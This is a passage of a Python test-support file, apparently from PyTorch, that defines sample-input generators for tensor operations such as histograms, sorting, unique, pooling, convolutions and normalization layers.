
    sizes = ((S, S), (S, S, S), (S, 1, S), (S, 0, S))
    bin_ct_patterns = ((1, 1, 1, 1, 1), (2, 3, 2, 3, 2), (3, 2, 3, 2, 3))

    sample_inputs = []
    for size, bin_ct_pattern, weighted, density in product(sizes, bin_ct_patterns, [False, True], [False, True]):
        input_tensor = make_arg(size)
        bin_ct = bin_ct_pattern[:size[-1]]
        weight_tensor = make_arg(size[:-1]) if weighted else None

        sample_inputs.append(SampleInput(input_tensor, args=(bin_ct,),
                                         kwargs=dict(weight=weight_tensor, density=density)))

        bins_tensor = [make_arg(ct + 1) for ct in bin_ct]
        sample_inputs.append(SampleInput(input_tensor, args=(bins_tensor,),
                                         kwargs=dict(weight=weight_tensor, density=density)))

    return sample_inputs

def sample_inputs_histc(op_info, device, dtype, requires_grad, **kwargs):
    make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad)

    sizes = ((), (S,), (S, S), (S, S, S), (S, 1, S), (S, 0, S))

    sample_inputs = []
    for size, min, max in product(sizes, [0, -10], [0, 10]):
        # construct sample input omitting bins arg
        sample_inputs.append(SampleInput(make_arg(size), kwargs=dict(min=min, max=max)))

        # construct sample inputs with a few different bins values
        for bins in [1, 3, 10]:
            sample_inputs.append(SampleInput(make_arg(size), kwargs=dict(bins=bins, min=min, max=max)))

    return sample_inputs
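# Sketch of the two calling conventions exercised above for torch.histogram
# (the demo helper itself is hypothetical): an integer bin count with optional
# weight/density kwargs, or an explicit, monotonically increasing tensor of
# bin edges.
def _demo_histogram_conventions():
    t = torch.tensor([0.1, 0.4, 0.4, 0.9])
    hist_by_count, _ = torch.histogram(t, 4, density=True)  # integer bin count
    hist_by_edges, _ = torch.histogram(t, torch.tensor([0., 0.5, 1.]))  # explicit edges
    return hist_by_count, hist_by_edges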
def sample_inputs_bincount(op_info, device, dtype, requires_grad, **kwargs):
    make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad)

    sample_inputs = []
    for size, weighted in product((S, M), [False, True]):
        input_tensor = torch.randint(0, size, (size,), dtype=dtype, device=device)
        weight_tensor = make_arg((size,)) if weighted else None

        max_val = int(input_tensor.max().item())

        for minlength in [0, max_val // 2, max_val, 2 * max_val]:
            sample_inputs.append(SampleInput(input_tensor,
                                             kwargs=dict(weights=weight_tensor, minlength=minlength)))

    return sample_inputs

def sample_inputs_bucketize(op_info, device, dtype, requires_grad, **kwargs):
    make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad)

    sizes = ((), (S,), (S, S), (S, S, S), (S, 1, S), (S, 0, S))

    sample_inputs = []
    for size, out_int32, right in product(sizes, [False, True], [False, True]):
        input_tensor = make_arg(size)
        boundaries = make_arg((S,)).msort()

        sample_inputs.append(SampleInput(input_tensor, args=(boundaries, ),
                                         kwargs=dict(out_int32=out_int32, right=right)))

    return sample_inputs

def sample_inputs_searchsorted(op_info, device, dtype, requires_grad, **kwargs):
    make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad)

    sizes = ((0,), (M,), (0, 0), (M, M), (0, 0, 0), (M, M, M))
    inputs = []
    for size, noncontiguous, out_int32, right in product(sizes, [False, True], [False, True], [False, True]):
        unsorted_tensor = make_arg(size, noncontiguous=noncontiguous)
        input_tensor = make_arg(size, noncontiguous=noncontiguous)
        if np.product(size) == 0:
            boundary_tensor = unsorted_tensor
            sorter = make_tensor(size, dtype=torch.int64, device=device, noncontiguous=noncontiguous)
        else:
            boundary_tensor, sorter = torch.sort(unsorted_tensor)
        side = "right" if right else "left"

        inputs.append(SampleInput(boundary_tensor, args=(input_tensor,),
                                  kwargs=dict(out_int32=out_int32, right=right)))
        inputs.append(SampleInput(boundary_tensor, args=(input_tensor,),
                                  kwargs=dict(out_int32=out_int32, side=side)))

        inputs.append(
            SampleInput(unsorted_tensor, args=(input_tensor,),
                        kwargs=dict(out_int32=out_int32, right=right, sorter=sorter)))
        inputs.append(
            SampleInput(unsorted_tensor, args=(input_tensor,),
                        kwargs=dict(out_int32=out_int32, side=side, sorter=sorter)))
    return inputs

def sample_inputs_gradient(op_info, device, dtype, requires_grad, **kwargs):
    sample_inputs = []
    test_cases_float = (
        ((S,), None, None, 1),
        ((S,), 2., None, 1),
        ((S, S), None, None, 2),
        ((S, S), [2.0, 2.1], None, 1),
        ((S, S), [2.0, 2.1], (0, 1), 1),
        ((4, 4, 4), [2., 1.], (0, 1), 2),
    )
    for size, spacing, dim, edge_order in test_cases_float:
        t = make_tensor(size, dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad)
        sample_inputs.append(SampleInput(t, kwargs=dict(dim=dim, spacing=spacing, edge_order=edge_order)))

    test_cases_tensor = (
        ((3, 3, 3), ((1.1, 2.0, 3.5), (4.0, 2, 6.0)), (0, -1), 1),
        ((3, 3, 3), ((1.0, 3.0, 2.0), (8.0, 6.0, 1.0)), (0, 1), 2),
    )
    for size, coordinates, dim, edge_order in test_cases_tensor:
        t = make_tensor(size, dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad)
        coordinates_tensor_list = []
        for coords in coordinates:
            # `coords` will always contain floating point values and Python 3.10 does not support this
            # implicit conversion to an integer using `__int__`
            # TODO: this can be simplified after https://github.com/pytorch/pytorch/issues/69316 is fixed
            a = torch.tensor(coords, device=device)
            coordinates_tensor_list.append(a.to(dtype))
        sample_inputs.append(SampleInput(t, kwargs=dict(dim=dim, spacing=coordinates_tensor_list,
                                                        edge_order=edge_order)))

    return tuple(sample_inputs)

def sample_inputs_getitem(op_info, device, dtype, requires_grad, **kwargs):
    make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad)
    test_args = [
        ([1, 2],),
        (slice(0, 3),),
        ([slice(0, 3), 1],),
        ([[0, 2, 3], [1, 3, 3], [0, 0, 2]],),
        ([[0, 0, 3], [1, 1, 3], [0, 0, 2]],),
        ([slice(None), slice(None), [0, 3]],),
        ([slice(None), [0, 3], slice(None)],),
        ([[0, 3], slice(None), slice(None)],),
        ([[0, 3], [1, 2], slice(None)],),
        ([[0, 3], ],),
        ([[0, 3], slice(None)],),
        ([[0, 3], Ellipsis],),
        ([[0, 2, 3], [1, 3, 3], torch.LongTensor([0, 0, 2])],),
        (index_variable(2, S, device=device),),
        (mask_not_all_zeros((S,)),),
    ]

    for args in test_args:
        yield SampleInput(make_arg((S, S, S)), args=args)

    yield SampleInput(make_arg((S, S, S, S)), args=([slice(None), [0, 1], slice(None), [0, 1]],))

def sample_inputs_index_put(op_info, device, dtype, requires_grad, **kwargs):
    make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad)

    inputs = []
    for accumulate in [False, True]:
        # Test with indices arg
        inputs.append(SampleInput(
            make_arg((S, S,)),
            args=((index_variable(2, S, device=device),), make_arg((2, S))),
            kwargs=dict(accumulate=accumulate)))

        # Test with mask arg
        mask = torch.zeros(S, dtype=torch.bool) if accumulate else mask_not_all_zeros((S,))
        inputs.append(SampleInput(
            make_arg((S, S)),
            args=((mask, ), make_arg((S,))),
            kwargs=dict(accumulate=accumulate)))

    return inputs

def sample_inputs_sort(op_info, device, dtype, requires_grad, **kwargs):
    def small_3d_unique():
        res = torch.randperm(S * S * S, dtype=torch.int64, device=device).view(S, S, S)
        res = res.to(dtype).requires_grad_(requires_grad)
        return res

    def large_1d_unique():
        res = torch.randperm(L * L * L, dtype=torch.int64, device=device)
        res = res.to(dtype).requires_grad_(requires_grad)
        return res

    samples = []
    # Test case for large tensor.
    samples.append(SampleInput(large_1d_unique()))

    # Test cases for small 3d tensors.
    # Imitates legacy tests from test/test_torch.py
    dims = range(-3, 3)
    flag = [True, False]
    for dim, descending, stable in product(dims, flag, flag):
        # default schema without stable sort
        samples.append(SampleInput(small_3d_unique(), args=(dim, descending)))
        # schema with stable sort, no CUDA support yet
        if torch.device(device).type == 'cpu':
            samples.append(
                SampleInput(small_3d_unique(),
                            kwargs=dict(dim=dim, descending=descending, stable=stable))
            )

    # Test cases for scalar tensor
    samples.append(SampleInput(torch.tensor(1, dtype=dtype, device=device, requires_grad=requires_grad)))
    samples.append(SampleInput(torch.tensor(1, dtype=dtype, device=device, requires_grad=requires_grad),
                               args=(0,)))
    samples.append(SampleInput(torch.tensor(1, dtype=dtype, device=device, requires_grad=requires_grad),
                               args=(0, True)))

    # Test cases for stable sort
    samples.append(SampleInput(small_3d_unique(), kwargs=dict(stable=True)))
    samples.append(SampleInput(small_3d_unique(), kwargs=dict(dim=0, stable=True)))
    samples.append(SampleInput(small_3d_unique(), kwargs=dict(dim=0, descending=True, stable=True)))
    return samples

def sample_inputs_threshold(op_info, device, dtype, requires_grad, **kwargs):
    make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad)

    sizes = ((), (S,), (S, S), (S, S, S))
    samples = []
    for x_size in sizes:
        # threshold and values args must be numbers
        samples.append(SampleInput(make_arg(x_size), args=(make_arg(()).item(), make_arg(()).item())))
    return samples

def sample_inputs_argsort(*args, **kwargs):
    return [sample_input for sample_input in sample_inputs_sort(*args, **kwargs)
            if "stable" not in sample_input.kwargs]
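# Hypothetical sketch of the kwarg combinations generated below for
# torch.unique: with dim=None the input is flattened before deduplication,
# while with a dim, whole slices along that dim are deduplicated.
def _demo_unique_dim():
    t = torch.tensor([[1, 2], [1, 2], [3, 4]])
    flat_vals = torch.unique(t)  # tensor([1, 2, 3, 4])
    row_vals, counts = torch.unique(t, dim=0, return_counts=True)  # rows [1, 2] and [3, 4], counts [2, 1]
    return flat_vals, row_vals, counts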
def sample_inputs_unique(op_info, device, dtype, requires_grad, **kwargs):
    sizes = ((), (S,), (S, S), (S, S, S), (S, 1, S), (S, 0, S))

    sample_inputs = []
    for shape, sorted, return_inverse, return_counts, dim in \
            product(sizes, [False, True], [False, True], [False, True], [None, -2, -1, 0, 1, 2]):
        # torch.unique cannot be called if the input tensor has a zero dimension which isn't the selected dim
        # (compare with != rather than `is not`: identity comparison of ints is unreliable)
        if 0 in shape and shape.index(0) != dim:
            continue

        # skip invalid dim args
        if dim is not None and (dim < -len(shape) or dim >= len(shape)):
            continue

        kwargs = dict(sorted=sorted, return_inverse=return_inverse, return_counts=return_counts, dim=dim)

        # construct a test case with only one distinct value
        input_t = torch.zeros(shape, dtype=dtype, device=device, requires_grad=requires_grad)
        sample_inputs.append(SampleInput(input_t, kwargs=kwargs.copy()))

        # construct a test case with mixed 0s and 1s
        input_t = make_tensor(shape, dtype=torch.bool, device=device, requires_grad=False)\
            .to(dtype).requires_grad_(requires_grad)
        sample_inputs.append(SampleInput(input_t, kwargs=kwargs.copy()))

        # construct a test case with many different values
        input_t = make_tensor(shape, dtype=dtype, device=device, requires_grad=requires_grad)
        sample_inputs.append(SampleInput(input_t, kwargs=kwargs.copy()))

    return sample_inputs

def sample_inputs_unique_consecutive(*args, **kwargs):
    for sample_input in sample_inputs_unique(*args, **kwargs):
        if not sample_input.kwargs["sorted"]:
            sample_input.kwargs.pop("sorted")
            yield sample_input

def sample_inputs_adaptive_avg_pool1d(op_info, device, dtype, requires_grad, **kwargs):
    make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad)

    # Ordered as (input shape, output size)
    cases = (
        ((0, 8, 8), (5,)),
        ((3, 8, 8), 5),
        ((3, 8, 8), 1)
    )

    for input_shape, output_size in cases:
        # Batched
        yield SampleInput(make_arg(input_shape), args=(output_size,))
        # Unbatched
        yield SampleInput(make_arg(input_shape[1:]), args=(output_size,))

def sample_inputs_adaptive_avg_pool2d(op_info, device, dtype, requires_grad, **kwargs):
    make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad)

    # Ordered as (input shape, output size)
    cases = (
        ((1, 8, 8, 8), (5, 7)),
        ((2, 8, 8, 8), (None, 7)),
        ((1, 8, 4, 3), (5, None)),
        ((1, 8, 4, 3), (None, None)),
        ((1, 8, 4, 3), (5)),
    )

    for input_shape, output_size in cases:
        # Batched
        yield SampleInput(make_arg(input_shape), args=(output_size,))
        # Unbatched
        yield SampleInput(make_arg(input_shape[1:]), args=(output_size,))

def sample_inputs_adaptive_avg_pool3d(op_info, device, dtype, requires_grad, **kwargs):
    make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad)

    # Ordered as (input shape, output size)
    cases = (
        ((0, 8, 8, 8, 8), (5, 7, 4)),
        ((1, 8, 4, 3, 7), (None, None, None)),
        ((1, 8, 4, 3, 7), (1, 1, 1)),
        ((3, 3, 8, 8, 6), (5, 7, None)),
        ((1, 3, 8, 8, 6), (5, None, 2)),
        ((3, 3, 8, 8, 6), (None, 3, 2)),
    )

    for input_shape, output_size in cases:
        # Batched
        yield SampleInput(make_arg(input_shape), args=(output_size,))
        # Unbatched
        yield SampleInput(make_arg(input_shape[1:]), args=(output_size,))

def sample_inputs_adaptive_max_pool1d(op_info, device, dtype, requires_grad, **kwargs):
    make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad)

    # Ordered as (input shape, output size)
    cases = (
        # ((0, 8, 8), (5,)),
        # 0 batch size doesn't work, cannot reshape tensor of 0 elements into shape [0, 8, -1]
        ((3, 4, 4), 3),
        ((3, 4, 4), 1)
    )

    for shapes, return_idx in product(cases, (True, False)):
        # Batched
        yield SampleInput(make_arg(shapes[0]), args=(shapes[1], return_idx))
        # Unbatched
        yield SampleInput(make_arg(shapes[0][1:]), args=(shapes[1], return_idx))

def sample_inputs_adaptive_max_pool2d(op_info, device, dtype, requires_grad, **kwargs):
    make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad)

    # Ordered as (input shape, output size)
    cases = (
        # ((0, 8, 8, 8), (5, 7)),
        # 0 batch size doesn't work, cannot reshape tensor of 0 elements into shape [0, 8, -1]
        ((1, 4, 4, 4), (2, 3)),
        ((2, 4, 4, 4), (None, 3)),
        ((2, 4, 4, 4), (1, 1)),
        ((1, 4, 4, 3), (3, None)),
        ((1, 4, 4, 3), (None, None)),
        ((1, 4, 4, 3), (3)),
    )

    for shapes, return_idx in product(cases, (True, False)):
        # Batched
        yield SampleInput(make_arg(shapes[0]), args=(shapes[1], return_idx))
        # Unbatched
        yield SampleInput(make_arg(shapes[0][1:]), args=(shapes[1], return_idx))

def sample_inputs_adaptive_max_pool3d(op_info, device, dtype, requires_grad, **kwargs):
    make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad)

    # Ordered as (input shape, output size)
    cases = (
        # ((0, 8, 8, 8, 8), (5, 7, 4)),
        # 0 batch size doesn't work, cannot reshape tensor of 0 elements into shape [0, 8, -1]
        ((1, 4, 4, 3, 5), (None, None, None)),
        ((1, 4, 4, 3, 5), (1, 1, 1)),
        ((3, 3, 4, 4, 6), (2, 3, None)),
        ((1, 3, 4, 4, 6), (3, None, 2)),
        ((3, 3, 4, 4, 6), (None, 3, 2)),
    )

    for shapes, return_idx in product(cases, (True, False)):
        # Batched
        yield SampleInput(make_arg(shapes[0]), args=(shapes[1], return_idx))
        # Unbatched
        yield SampleInput(make_arg(shapes[0][1:]), args=(shapes[1], return_idx))

class _TestParamsMaxPoolBase(object):

    def __init__(self):
        self.kwargs = {
            'kernel_size': [3],
            'stride': [2, None],
            'ceil_mode': [True, False],
            'padding': [0, 1],
            'dilation': [1],
            'return_indices': [True, False]
        }

        self.shapes = [
            [1, 2, None],  # batch
            [2],  # channels
            [3, 6]  # signal
        ]

    def _gen_shape(self):
        for shape in product(*self.shapes):
            # shape[0] is None indicates missing batch dimension
            if shape[0] is None:
                shape = shape[1:]

            yield shape, torch.contiguous_format
            # only 2d (N, C, H, W) rank 4 tensors support channels_last memory format
            if len(self.shapes) == 4 and len(shape) == 4:
                yield shape, torch.channels_last

    def _gen_kwargs(self):
        keys = self.kwargs.keys()
        for values in product(*self.kwargs.values()):
            yield dict(zip(keys, values))

    def gen_input_params(self):
        yield from product(self._gen_shape(), self._gen_kwargs())

class _TestParamsMaxPool1d(_TestParamsMaxPoolBase):

    def __init__(self):
        super().__init__()
        self.kwargs['kernel_size'] += [(3,)]
        self.kwargs['stride'] += [(2,)]
        self.kwargs['padding'] += [(1,)]
        self.kwargs['dilation'] += [(1,)]

class _TestParamsMaxPool2d(_TestParamsMaxPoolBase):

    def __init__(self):
        super().__init__()
        self.kwargs['kernel_size'] += [(3, 2)]
        self.kwargs['stride'] += [(2, 1)]
        self.kwargs['padding'] += [(1, 1)]
        self.kwargs['dilation'] += [(1, 2)]

        self.shapes.append([6])

class _TestParamsMaxPool3d(_TestParamsMaxPoolBase):

    def __init__(self):
        super().__init__()
        self.kwargs['kernel_size'] += [(3, 2, 3)]
        self.kwargs['stride'] += [(2, 1, 2)]
        self.kwargs['dilation'] += [(1, 2, 1)]

        self.shapes.append([6])
        self.shapes.append([5])
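# Illustrative sketch (hypothetical helper): the _TestParamsMaxPool* classes
# above enumerate the cross product of shape variants and kwarg values; each
# generated entry is a ((shape, memory_format), kwargs) pair.
def _demo_max_pool_param_grid():
    configs = list(_TestParamsMaxPool2d().gen_input_params())
    (shape, memory_format), kwargs = configs[0]
    return len(configs), shape, kwargs['kernel_size']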
def sample_inputs_max_pool(op_info, device, dtype, requires_grad, **kwargs):
    make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=False)

    params_generator_type_dict = {
        'nn.functional.max_pool1d': _TestParamsMaxPool1d,
        'nn.functional.max_pool2d': _TestParamsMaxPool2d,
        'nn.functional.max_pool3d': _TestParamsMaxPool3d,
    }

    params_generator = params_generator_type_dict[op_info.name]()
    for (shape, memory_format), kwargs in params_generator.gen_input_params():
        arg = make_arg(shape).to(memory_format=memory_format).requires_grad_(requires_grad)
        yield SampleInput(arg, kwargs=kwargs)

def sample_inputs_normalize(self, device, dtype, requires_grad, **kwargs):
    make_arg = partial(make_tensor, low=-1, high=1, device=device, dtype=dtype, requires_grad=requires_grad)

    cases: Tuple[Tuple[int], dict] = (  # type: ignore[assignment]
        ((2, 1, 4, 5), {'p': 1., 'dim': 2}),
        ((2, 3, 4, 5), {'p': 2., 'dim': 1}),
        ((1, 2, 4, 5), {'p': 0.5, 'dim': 0}),
        ((1, 3, 4, 5), {'p': -1., 'dim': 1}),
        ((1, 3, 4, 5), {'p': 0., 'dim': -1}),
        ((), {'p': 1.2, 'dim': 0}),
        ((2, 3, 4, 5), {}),
        ((2, 3, 4, 5), {'eps': 1e-4}))

    for input_shape, kwargs in cases:
        yield SampleInput(make_arg(input_shape), kwargs=kwargs)

def sample_inputs_conv_transpose1d(op_info, device, dtype, requires_grad, **kwargs):
    make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad)

    # Ordered as shapes for input, weight, bias
    # and a dict of values of (stride, padding, output_padding, groups, dilation)
    cases: Tuple[Tuple[int], Tuple[int], Tuple[int], dict] = (  # type: ignore[assignment]
        ((1, 3, 4), (3, 3, 3), (3,),
         {'stride': (2,), 'padding': 2, 'output_padding': (1,), 'groups': 1}),
        ((2, 2, 4), (2, 2, 4), (4,),
         {'stride': (3,), 'padding': (1,), 'output_padding': (2,), 'groups': 2, 'dilation': (4,)}),
        ((1, 1, 4), (1, 1, 4), (1,),
         {'stride': 2, 'padding': 1, 'output_padding': 1, 'groups': 1, 'dilation': (2,)}),
        ((1, 1, 4), (1, 2, 3), None,
         {'stride': 2, 'padding': 1, 'output_padding': 1, 'groups': 1}),
        ((1, 4, 5), (4, 8, 3), None,
         {})
    )

    for input_shape, weight, bias, kwargs in cases:
        # Batched
        yield SampleInput(make_arg(input_shape), args=(
            make_arg(weight),
            make_arg(bias) if bias is not None else bias
        ), kwargs=kwargs)
        # Unbatched
        yield SampleInput(make_arg(input_shape[1:]), args=(
            make_arg(weight),
            make_arg(bias) if bias is not None else bias
        ), kwargs=kwargs)

def sample_inputs_conv_transpose2d(op_info, device, dtype, requires_grad, **kwargs):
    make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad)

    # Ordered as shapes for input, weight, bias
    # and a dict of values of (stride, padding, output_padding, groups, dilation)
    cases: Tuple[Tuple[int], Tuple[int], Tuple[int], dict] = (  # type: ignore[assignment]
        ((1, 3, 4, 4), (3, 3, 3, 3), (3,),
         {'stride': (2, 2), 'padding': 2, 'output_padding': (1, 1), 'groups': 1}),
        ((2, 2, 4, 4), (2, 2, 4, 5), (4,),
         {'stride': (3, 2), 'padding': (1, 2), 'output_padding': (2, 3), 'groups': 2, 'dilation': (4, 4)}),
        ((1, 1, 4, 5), (1, 1, 4, 3), (1,),
         {'stride': 2, 'padding': 1, 'output_padding': 1, 'groups': 1, 'dilation': (2, 3)}),
        ((1, 1, 4, 3), (1, 2, 3, 4), None,
         {'stride': 2, 'padding': 1, 'output_padding': 1, 'groups': 1}),
        ((1, 4, 5, 5), (4, 8, 3, 3), None,
         {})
    )

    for input_shape, weight, bias, kwargs in cases:
        # Batched
        yield SampleInput(make_arg(input_shape), args=(
            make_arg(weight),
            make_arg(bias) if bias is not None else bias
        ), kwargs=kwargs)
        # Unbatched
        yield SampleInput(make_arg(input_shape[1:]), args=(
            make_arg(weight),
            make_arg(bias) if bias is not None else bias
        ), kwargs=kwargs)

def sample_inputs_conv_transpose3d(op_info, device, dtype, requires_grad, **kwargs):
    make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad)

    # Ordered as shapes for input, weight, bias
    # and a dict of values of (stride, padding, output_padding, groups, dilation)
    cases: Tuple[Tuple[int], Tuple[int], Tuple[int], dict] = (  # type: ignore[assignment]
        ((1, 3, 4, 4, 4), (3, 3, 3, 3, 3), (3,),
         {'stride': (2, 2, 2), 'padding': 2, 'output_padding': (1, 1, 1), 'groups': 1}),
        ((2, 2, 4, 4, 4), (2, 2, 4, 5, 6), (4,),
         {'stride': (3, 2, 1), 'padding': (1, 2, 3), 'output_padding': (2, 3, 1), 'groups': 2, 'dilation': (4, 4, 4)}),
        ((1, 1, 4, 5, 2), (1, 1, 4, 3, 1), (1,),
         {'stride': 2, 'padding': 1, 'output_padding': 1, 'groups': 1, 'dilation': (2, 3, 2)}),
        ((1, 1, 4, 3, 4), (1, 2, 3, 4, 5), None,
         {'stride': 2, 'padding': 1, 'output_padding': 1, 'groups': 1}),
        ((1, 4, 5, 5, 5), (4, 8, 3, 3, 3), None,
         {})
    )

    for input_shape, weight, bias, kwargs in cases:
        # Batched
        yield SampleInput(make_arg(input_shape), args=(
            make_arg(weight),
            make_arg(bias) if bias is not None else bias
        ), kwargs=kwargs)
        # Unbatched
        yield SampleInput(make_arg(input_shape[1:]), args=(
            make_arg(weight),
            make_arg(bias) if bias is not None else bias
        ), kwargs=kwargs)

def sample_inputs_conv1d(op_info, device, dtype, requires_grad, **kwargs):
    make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad)

    # Ordered as shapes for input, weight, bias,
    # and a dict of values of (stride, padding, dilation, groups)
    cases: Tuple = (
        ((1, 3, 4), (3, 3, 3), (3,), {'stride': (2,), 'padding': 2, 'groups': 1}),
        ((2, 4, 8), (2, 2, 3), (2,), {'stride': 3, 'padding': 1, 'groups': 2, 'dilation': 2}),
        ((1, 4, 5), (1, 4, 3), None, {'stride': (2,), 'padding': 'valid'}),
        ((2, 2, 4), (2, 1, 4), (2,), {'stride': (1,), 'padding': 'same', 'groups': 2, 'dilation': (2,)}),
        # With defaults
        ((1, 4, 5), (3, 4, 3), None, {}),
    )

    # TODO: (@krshrimali), add error_inputs_func once https://github.com/pytorch/pytorch/pull/67354 is merged
    # Should replace test_conv_modules_raise_error_on_incorrect_input_size and test_conv_shapecheck
    # in test/test_nn.py
    for input_shape, weight, bias, kwargs in cases:
        # Batched
        yield SampleInput(make_arg(input_shape), args=(
            make_arg(weight),
            make_arg(bias) if bias is not None else bias
        ), kwargs=kwargs)
        # Unbatched
        yield SampleInput(make_arg(input_shape[1:]), args=(
            make_arg(weight),
            make_arg(bias) if bias is not None else bias
        ), kwargs=kwargs)
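# Hypothetical sketch of the string padding modes exercised by the conv
# samples above: F.conv1d accepts padding='valid' (no padding) and
# padding='same' (output length equals input length; requires stride 1).
def _demo_conv1d_padding_strings():
    import torch.nn.functional as F
    x = torch.randn(1, 4, 5)
    w = torch.randn(1, 4, 3)
    y_valid = F.conv1d(x, w, padding='valid')  # length 5 - 3 + 1 = 3
    y_same = F.conv1d(x, w, padding='same')    # length 5
    return y_valid.shape, y_same.shape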
def sample_inputs_conv2d(op_info, device, dtype, requires_grad, jit_fail_sample=False, **kwargs):
    make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad)

    # Ordered as shapes for input, weight, bias
    # and a dict of values of (stride, padding, groups, dilation)
    cases: Tuple = (
        ((1, 3, 4, 4), (3, 3, 3, 3), (3,),
         {'stride': (2, 2), 'padding': 2, 'groups': 1}),
        ((2, 4, 8, 8), (2, 2, 3, 3), (2,),
         {'stride': (3, 2), 'padding': (2, 1), 'groups': 2, 'dilation': (4, 4)}),
        ((1, 4, 5, 5), (1, 4, 2, 3), (1,),
         {'stride': 2, 'padding': 1, 'groups': 1, 'dilation': (2, 3)}),
        ((1, 4, 5, 5), (1, 4, 2, 3), (1,),
         {'stride': 2, 'padding': 1, 'groups': 1, 'dilation': (2, 3)}),
        ((1, 2, 4, 3), (4, 2, 3, 4), None,
         {'stride': 2, 'padding': 1, 'groups': 1}),
        ((1, 4, 5, 5), (1, 4, 2, 3), (1,),
         {'stride': 2, 'padding': "valid"}),
        ((1, 4, 5, 5), (1, 4, 2, 3), (1,),
         {'stride': 1, 'padding': "same", 'dilation': 3}),
        # Below are the group related samples from common_nn.py
        ((2, 4, 6, 6), (4, 1, 3, 3), (4,), {'groups': 4}),
        ((2, 4, 6, 6), (8, 1, 3, 3), (8,), {'groups': 4}),
        ((2, 4, 6, 6), (8, 1, 3, 3), None, {'groups': 4}),
        ((2, 4, 6, 6), (4, 1, 3, 3), (4,), {'groups': 4, 'stride': (3, 2)}),
        ((2, 4, 6, 6), (4, 1, 3, 3), (4,), {'groups': 4, 'padding': (1, 1)}),
        ((2, 4, 5, 5), (4, 1, 2, 2), (4,), {'groups': 4, 'dilation': (2, 2)}),
        ((2, 4, 6, 5), (6, 2, 3, 2), (6,), {'groups': 2}),
        # With defaults
        ((1, 4, 5, 5), (3, 4, 3, 3), None, {}),
    )

    for input_shape, weight, bias, kwargs in cases:
        # Batched
        yield SampleInput(make_arg(input_shape), args=(
            make_arg(weight),
            make_arg(bias) if bias is not None else bias
        ), kwargs=kwargs)
        # Unbatched
        yield SampleInput(make_arg(input_shape[1:]), args=(
            make_arg(weight),
            make_arg(bias) if bias is not None else bias
        ), kwargs=kwargs)

def sample_inputs_group_norm(opinfo, device, dtype, requires_grad, **kwargs):
    make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad)

    # Ordered as input shape, num groups, and eps
    cases: Tuple[Tuple[int], int, float] = (  # type: ignore[assignment]
        ((1, 6, 3), 2, 0.5),
        ((2, 6, 3), 2, -0.5),
        ((1, 2), 1, None),
        ((0, 2), 1, None),
    )

    for input_shape, num_groups, eps in cases:
        # Shape of weight and bias should be the same as num_channels
        weight = make_arg(input_shape[1])
        bias = make_arg(input_shape[1])
        kwargs = {'weight': weight, 'bias': bias} if eps is None else {'weight': weight, 'bias': bias, 'eps': eps}
        yield SampleInput(
            make_arg(input_shape),
            args=(num_groups,),
            kwargs=kwargs
        )
    # Without any optional args
    yield SampleInput(make_arg((1, 2)), args=(1,))

def sample_inputs_instance_norm(opinfo, device, dtype, requires_grad, **kwargs):
    make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad)
    make_arg_without_requires_grad = partial(make_tensor, device=device, dtype=dtype, requires_grad=False)

    # Ordered as: input shape, kwargs for momentum, eps
    cases: Tuple[Tuple[int], dict] = (  # type: ignore[assignment]
        ((S, S, S), {'momentum': 0.5, 'eps': 0.6}),
        ((S, S, S), {'momentum': 0.5, 'eps': 0.6, 'use_input_stats': True}),
        ((3, 2, 4), {'momentum': -1.2}),
        ((3, 2, 4), {'momentum': 0.0}),
        ((3, 2, 3, 4), {'momentum': -1.0, 'eps': 0.5}),
        ((3, 2, 3, 4), {'momentum': -1.0, 'eps': 0.5}),
    )

    for input_shape, kwargs in cases:
        # args: running mean, running var, weight and bias should necessarily be of shape: (channels,)
        channels = input_shape[1]
        weight = make_arg(channels)
        bias = make_arg(channels)
        running_mean = make_arg_without_requires_grad(channels, low=0)
        running_var = make_arg_without_requires_grad(channels, low=0)
        new_kwargs = {
            'running_mean': running_mean,
            'running_var': running_var,
            'weight': weight,
            'bias': bias,
            **kwargs
        }

        yield SampleInput(
            make_arg(input_shape),
            args=(),
            kwargs=new_kwargs
        )

    # Checking for permutations of weights and biases as `None`
    # instance_norm assumes that if there's a bias, there's a weight
    weights = [channels, None]
    biases = [None, None]

    for weight_channels, bias_channels in zip(weights, biases):
        running_mean = make_arg_without_requires_grad(channels, low=0)
        running_var = make_arg_without_requires_grad(channels, low=0)
        yield SampleInput(
            make_arg(input_shape),
            args=(),
            kwargs={
                'running_mean': running_mean,
                'running_var': running_var,
                'weight': make_arg(weight_channels) if weight_channels is not None else None,
                'bias': make_arg(bias_channels) if bias_channels is not None else None
            }
        )

    # Test case for no optional kwargs
    yield SampleInput(make_arg((1, 2, 3)), kwargs={})

def sample_inputs_layer_norm(opinfo, device, dtype, requires_grad, **kwargs):
    make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad)

    # Ordered as input shape, normalized_shape and a kwarg dict for eps
    cases: Tuple[Tuple[int], Tuple[int], dict] = (  # type: ignore[assignment]
        ((1, 2, 3), (1, 2, 3), {'eps': 0.5}),
        ((2, 2, 3), (2, 3), {'eps': -0.5}),
        ((1,), (1,), {}),
        ((1, 2), (2,), {}),
